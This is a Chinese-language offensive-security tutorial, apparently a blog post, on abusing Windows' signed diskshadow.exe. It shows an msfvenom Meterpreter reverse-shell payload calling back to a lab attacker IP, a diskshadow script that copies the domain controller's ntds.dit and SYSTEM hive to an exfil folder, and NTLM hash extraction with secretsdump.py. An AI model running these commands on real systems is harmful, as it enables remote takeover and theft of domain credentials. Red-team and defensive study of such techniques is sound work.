當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x03 利用DiskShadow.exe執行payload法
0x01 DiskShadow簡介
diskshadow.exe是一種工具,可公開卷影複製服務(VSS)提供的功能。默認情況下,diskshadow使用類似於diskraid或DiskPart的交互式命令解釋器。diskshadow還包括可編寫腳本的模式。(詳見微軟官方文檔https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow)
DiskShadow的代碼由微軟官方簽名,而且Windows Server 2008、Windows Server 2012和Windows Server 2016中都包含了DiskShadow:
0x02 DiskShadow命令執行
交互式命令解釋器和腳本模式支持EXEC命令,無論是特權用戶還是非特權用戶,他們都可以在交互模式下或通過一個腳本文件來調用其他命令以及batch腳本。
-
交互模式:
使用exec命令調用系統自帶的計算器程序
-
腳本模式:
使用diskshadow.exe /s 命令調用腳本打開notepad.exe程序
需要注意的是,DiskShadow.exe是命令所生成的可執行程序的父進程。除此之外,DiskShadow將會一直運行下去,直到它的子進程終止執行。
0x03 利用DiskShadow.exe執行payload法
靶機:Windows server 2008 R2 ip地址:192.168.10.136
攻擊機:kali linux ip地址:192.168.10.130
DiskShadow.exe可以執行exe文件,在這裏我們先用msf生成exe格式shellcode:
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=1234 -f exe > ./hacker.exe
設置msf監聽端口:
使用diskshadow.exe /s 命令調用腳本打開hacker.exe程序
攻擊機監聽到靶機上線:
打開殺軟,使用diskshadow.exe /s 命令調用腳本打開hacker.exe程序。
360全家桶和火絨均報毒並刪除
0x04 DiskShadow提取活動目錄數據庫
前文已經提到diskshadow.exe是一種工具,可公開卷影複製服務(VSS)提供的功能。那麼,我們可以來看看卷影複製功能下,是如何來對活動目錄數據庫ntds.dit進行數據提取的。NTDS.DIT是一個二進制文件,就等同於本地計算機的SAM文件,它的存放位置是%SystemRoot%\ntds\NTDS.DIT,這裏麪包含的不只是Username和HASH,還有OU、Group等等。
在以下應用中,我們假設活動目錄域控制器已被攻擊者成功拿下控制,並能有效在特權用戶環境中以腳本模式執行DiskShadow命令。首先,我們要準備腳本,我們會先對包含活動目錄數據庫的目標磁盤驅動器號進行踩點偵測,瞭解未被系統磁盤使用的驅動器號。以下就是腳本jiaoben.txt的內容:
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset通過腳本我們創建了一個持久化卷影拷貝,這樣就能夠執行復制操作並捕捉到目標系統中的敏感文件了。通過監控目標邏輯驅動器,能夠確定目標文件的拷貝路徑,在刪除卷影拷貝之前,將把這個拷貝路徑下的文件拷貝到“exfil”目錄之中。
注意:我們還可以通過卷影設備名稱/唯一標識符來拷貝出我們的目標文件,這種方法的隱蔽性比較高,但是還需要確保目標文件標籤/UUID是正確的(通過網絡偵察活動確定),否則我們的腳本將無法正常運行,這種技術在交互模式下的可行性更高。
下圖給出的是命令執行以及DiskShadow運行的結果:
type C:\Users\Administrator\Desktop\jiaoben.txt
diskshadow.exe /s C:\Users\Administrator\Desktop\jiaoben.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
此時可以看到文件夾中的ntds.dit和system.bak文件
使用腳本SecretsDump.py(下載地址:https://github.com/SecureAuthCorp/impacket),就可以還原出文件中的NTLM哈希
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
參考鏈接:
DiskShadow工具介紹:https://www.anquanke.com/post/id/103117
雖然我們生活在陰溝裏,但依然有人仰望星空!